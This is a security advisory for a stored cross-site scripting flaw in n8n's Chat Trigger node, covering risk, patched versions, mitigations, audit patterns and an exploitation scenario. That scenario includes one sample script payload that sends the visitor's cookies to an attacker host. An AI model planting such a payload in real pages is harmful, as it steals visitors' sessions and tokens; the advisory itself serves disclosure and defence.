Any n8n deployment below the patched versions that runs the Chat Trigger node (LangChain integration) with a public chat URL exposes its visitors to stored XSS: a user with permission to create or edit workflows can inject script through the node's Custom CSS field, and it executes in the browser of everyone who opens the chat. Patch to n8n 1.123.27, 2.13.3, or 2.14.1. If patching is blocked, restrict workflow edit permissions to fully trusted accounts and disable the Chat Trigger node via the NODES_EXCLUDE environment variable.
What is the risk?
The CVSS v3.1 base score of 5.4 (Medium) understates operational risk in AI-native environments. Scope:Changed (S:C) reflects the cross-boundary impact: the attacker plants the payload in the workflow configuration inside the n8n editor, but it detonates in the browser of every visitor to the public chat page. Chat Trigger nodes typically front LLM-powered assistants wired to RAG backends, API credentials, and workflow execution context, so script running in the chat page's origin can read and drive the conversation as the victim, collect any cookies or tokens that origin exposes to JavaScript, and, when the victim is an n8n user on the same host, potentially act against their editor session as well. Exploitation requires an account that can create or edit workflows (PR:L) and a victim who opens the chat (UI:R); attack complexity is low once such an account is compromised or abused. No active exploitation reported; not in CISA KEV.
What systems are affected?
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| n8n | npm | 1.x < 1.123.27 | 1.123.27 |
| n8n | npm | 2.13.x < 2.13.3 | 2.13.3 |
| n8n | npm | 2.14.0 | 2.14.1 |
The 2.x rows are derived from the advisory's list of fixed versions (2.13.3 and 2.14.1); consult the GitHub advisory for the exact lower bound of the affected 2.x range. If you run n8n below these versions and any workflow uses the Chat Trigger node with a public chat URL, you are affected.
What should I do?
1. PATCH: Upgrade to n8n 1.123.27 (1.x branch), 2.13.3, or 2.14.1. This is the only full remediation.
2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC, and audit current role assignments now.
3. DISABLE NODE: Add the node type to NODES_EXCLUDE, which takes a JSON array of node type names: NODES_EXCLUDE='["@n8n/n8n-nodes-langchain.chatTrigger"]'. This stops the Chat Trigger node from being loaded, so every workflow that depends on it stops working, and any injected CSS stays in the stored workflow until it is removed.
4. AUDIT: Export your workflows and scan the Chat Trigger node parameters for <script, </style, javascript:, inline event handlers (onerror=, onload=, and similar), or base64 in the Custom CSS field. Treat base64 as a weak signal, since CSS legitimately embeds data: URIs.
5. ROTATE: After patching, invalidate all active chat session tokens and any credential that a script running in the chat page's origin could have reached.
6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.
Frequently Asked Questions
What is GHSA-3c7f-5hgj-h279?
GHSA-3c7f-5hgj-h279 is a stored cross-site scripting vulnerability in the n8n Chat Trigger node (LangChain integration). An authenticated user with permission to create or modify workflows can inject JavaScript through the node's Custom CSS field; a misconfiguration of the sanitize-html library lets it through, and the script runs in the browser of anyone who opens the public chat URL. It is fixed in n8n 1.123.27, 2.13.3, and 2.14.1. Until you patch, restrict workflow edit permissions to fully trusted accounts and disable the node via the NODES_EXCLUDE environment variable.
Is GHSA-3c7f-5hgj-h279 actively exploited?
No confirmed active exploitation of GHSA-3c7f-5hgj-h279 has been reported, but organizations should still patch proactively.
How to fix GHSA-3c7f-5hgj-h279?
1. PATCH: Upgrade to n8n 1.123.27 (1.x branch), 2.13.3, or 2.14.1; this is the only full remediation. 2. RESTRICT: If patching is delayed, limit workflow creation and editing roles to explicitly vetted users via n8n RBAC and audit current role assignments now. 3. DISABLE NODE: Set NODES_EXCLUDE='["@n8n/n8n-nodes-langchain.chatTrigger"]' (the variable takes a JSON array of node type names) to block Chat Trigger instantiation; workflows that use the node stop working. 4. AUDIT: Export workflows and scan Chat Trigger parameters for <script, </style, javascript:, inline event handlers, or base64 in the Custom CSS field. 5. ROTATE: Invalidate all active chat session tokens after patching. 6. MONITOR: Alert on workflow save events that modify Chat Trigger CSS fields post-patch to detect residual or re-injected payloads.
What systems are affected by GHSA-3c7f-5hgj-h279?
This vulnerability affects n8n instances below 1.123.27 (1.x), 2.13.3, or 2.14.1 in which a workflow uses the Chat Trigger node with a public chat URL. In practice that means LangChain-based agent workflows and workflow-automation deployments that expose a public-facing chat interface, often acting as a proxy in front of an LLM API, a RAG backend, or other downstream integrations.
What is the CVSS score for GHSA-3c7f-5hgj-h279?
GHSA-3c7f-5hgj-h279 has a CVSS v3.1 base score of 5.4 (MEDIUM).
Technical Details
NVD Description
Impact
An authenticated user with permission to create or modify workflows could inject malicious JavaScript into the Custom CSS field of the Chat Trigger node. Due to a misconfiguration in the `sanitize-html` library, the sanitization could be bypassed, resulting in stored XSS on the public chat page. Any user visiting the chat URL would be affected.
Patches
The issue has been fixed in n8n versions 1.123.27, 2.13.3, and 2.14.1. Users should upgrade to one of these versions or later to remediate the vulnerability.
Workarounds
If upgrading is not immediately possible, administrators should consider the following temporary mitigations:
- Limit workflow creation and editing permissions to fully trusted users only.
- Disable the Chat Trigger node by adding `@n8n/n8n-nodes-langchain.chatTrigger` to the `NODES_EXCLUDE` environment variable.
These workarounds do not fully remediate the risk and should only be used as short-term mitigation measures.
Exploitation Scenario
A threat actor with legitimate (or compromised) workflow editor credentials opens an n8n workflow containing a Chat Trigger node and places a payload such as <script>fetch('https://c2.attacker.com/x?t='+document.cookie)</script> in the Custom CSS field. Because of the sanitize-html misconfiguration the tag is not stripped. The workflow is saved and activated, so the payload now lives in the persistent workflow configuration and is served with every load of the public chat page. When a customer service agent, an external user, or an automated client opens the chat URL, the script runs in that page's origin: it can read the conversation, send requests as the victim to that origin, and exfiltrate any cookie or token the origin exposes to JavaScript. If a stolen token grants access to the chat session or to a downstream service the chat proxies (LLM API, RAG knowledge base, CRM integration), the attacker can replay it and pivot through the connected workflow toolchain without triggering additional alerts. Note that the victim must open the chat (UI:R), and that what the script can reach depends on which credentials the chat page's origin actually holds.
Weaknesses (CWE)
CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
Related Vulnerabilities
- CVE-2026-33663 (10.0) n8n: member role steals plaintext HTTP credentials (same package: n8n)
- CVE-2026-33660 (10.0) TensorFlow: type confusion NPD in tensor conversion
- CVE-2026-21858 (10.0) n8n: Input Validation flaw enables exploitation (same package: n8n)
- CVE-2026-27577 (9.9) n8n: Code Injection enables RCE (same package: n8n)
- CVE-2026-27494 (9.9) n8n: security flaw enables exploitation (same package: n8n)